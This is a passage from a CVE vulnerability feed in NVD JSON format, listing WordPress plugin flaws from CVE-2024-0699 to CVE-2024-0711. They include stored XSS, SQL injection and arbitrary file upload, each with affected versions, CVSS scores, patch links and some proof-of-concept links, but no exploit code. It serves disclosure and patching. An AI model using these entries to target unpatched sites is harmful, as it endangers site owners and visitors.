"https://www.wordfence.com/threat-intel/vulnerabilities/id/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Easy!Appointments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:easyappointments:easy\\!appointments:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-05T02:15Z", "lastModifiedDate" : "2025-03-24T14:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0699", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php", "name" : "https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php", "name" : "https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'add_image_from_url' function in all versions up to, and including, 2.1.4. This makes it possible for authenticated attackers, with Editor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:meowapps:ai_engine:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.1.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2025-05-15T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0700", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/wTeBwAA/PoC-SimpleTweet/blob/main/POST-request", "name" : "https://github.com/wTeBwAA/PoC-SimpleTweet/blob/main/POST-request", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/wTeBwAA/PoC-SimpleTweet/blob/main/POST-request", "name" : "https://github.com/wTeBwAA/PoC-SimpleTweet/blob/main/POST-request", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://wordpress.org/plugins/simple-tweet/", "name" : "https://wordpress.org/plugins/simple-tweet/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://wordpress.org/plugins/simple-tweet/", "name" : "https://wordpress.org/plugins/simple-tweet/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Simple Tweet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tweet this text value in all versions up to, and including, 1.4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wokamoto:simple_tweet:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.4.0.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T13:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0701", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681", "name" : "https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681", "name" : "https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The UserPro plugin for WordPress is vulnerable to Security Feature Bypass in all versions up to, and including, 5.1.6. This is due to the use of client-side restrictions to enforce the 'Disabled registration' Membership feature within the plugin's General settings. This makes it possible for unauthenticated attackers to register an account even when account registration has been disabled by an administrator." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:userproplugin:userpro:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "5.1.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0702", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-install.php#L11", "name" : "https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-install.php#L11", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-install.php#L11", "name" : "https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-install.php#L11", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Oliver POS – A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions hooked via AJAX in the includes/class-pos-bridge-install.php file in all versions up to, and including, 2.4.1.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several unauthorized actions like deactivating the plugin, disconnecting the subscription, syncing the status and more." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oliverpos:oliver_pos:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.4.2.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-03-04T12:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0703", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c070be-e955-4076-9878-0b1044766397?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c070be-e955-4076-9878-0b1044766397?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c070be-e955-4076-9878-0b1044766397?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c070be-e955-4076-9878-0b1044766397?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Sticky Buttons – floating buttons builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via sticky URLs in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wow-company:sticky_buttons:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-23T11:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0704", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: very low impact - impractical to correct" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-02-01T15:15Z", "lastModifiedDate" : "2024-02-01T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0705", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:webtoffee:stripe_payment_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.8.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-19T10:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0706", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: ***REJECT*** This was a false positive report." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-01-22T15:15Z", "lastModifiedDate" : "2024-01-22T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0707", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: **REJECT** Not a valid vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-02-13T14:15Z", "lastModifiedDate" : "2024-02-13T14:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0708", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3034324/landing-page-cat/trunk/includes/landing/landing.php", "name" : "https://plugins.trac.wordpress.org/changeset/3034324/landing-page-cat/trunk/includes/landing/landing.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3034324/landing-page-cat/trunk/includes/landing/landing.php", "name" : "https://plugins.trac.wordpress.org/changeset/3034324/landing-page-cat/trunk/includes/landing/landing.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Landing Page Cat – Coming Soon Page, Maintenance Page & Squeeze Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to access landing pages that may not be public." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fatcatapps:landing_page_cat:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "1.7.3", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-15T07:15Z", "lastModifiedDate" : "2025-01-23T17:18Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0709", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172", "name" : "https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172", "name" : "https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Cryptocurrency Widgets – Price Ticker & Coins List plugin for WordPress is vulnerable to SQL Injection via the 'coinslist' parameter in versions 2.0 to 2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:coolplugins:cryptocurrency_widgets:*:*:*:*:free:wordpress:*:*", "versionStartIncluding" : "2.0", "versionEndIncluding" : "2.6.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2025-03-18T15:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0710", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/karlemilnikka/CVE-2024-0710/blob/main/README.md", "name" : "https://github.com/karlemilnikka/CVE-2024-0710/blob/main/README.md", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/karlemilnikka/CVE-2024-0710/blob/main/README.md", "name" : "https://github.com/karlemilnikka/CVE-2024-0710/blob/main/README.md", "refsource" : "", "tags" : [ ] }, { "url" : "https://gravitywiz.com/documentation/gravity-forms-unique-id/", "name" : "https://gravitywiz.com/documentation/gravity-forms-unique-id/", "refsource" : "", "tags" : [ ] }, { "url" : "https://gravitywiz.com/documentation/gravity-forms-unique-id/", "name" : "https://gravitywiz.com/documentation/gravity-forms-unique-id/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26db2d25-01b8-49c5-a4d6-284780ac97bb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26db2d25-01b8-49c5-a4d6-284780ac97bb?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26db2d25-01b8-49c5-a4d6-284780ac97bb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26db2d25-01b8-49c5-a4d6-284780ac97bb?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The GP Unique ID plugin for WordPress is vulnerable to Unique ID Modification in all versions up to, and including, 1.5.5. This is due to insufficient input validation. This makes it possible for unauthenticated attackers to tamper with the generation of a unique ID on a form submission and replace the generated unique ID with a user-controlled one, leading to a loss of integrity in cases where the ID's uniqueness is relied upon in a security-specific context." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-02T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0711", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/8e286c04-ef32-4af0-be78-d978999b2a90/", "name" : "https://wpscan.com/vulnerability/8e286c04-ef32-4af0-be78-d978999b2a90/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/8e286c04-ef32-4af0-be78-d978999b2a90/", "name" : "https://wpscan.com/vulnerability/8e286c04-ef32-4af0-be78-d978999b2a90/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Buttons Shortcode and Widget WordPress plugin through 1.16 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : 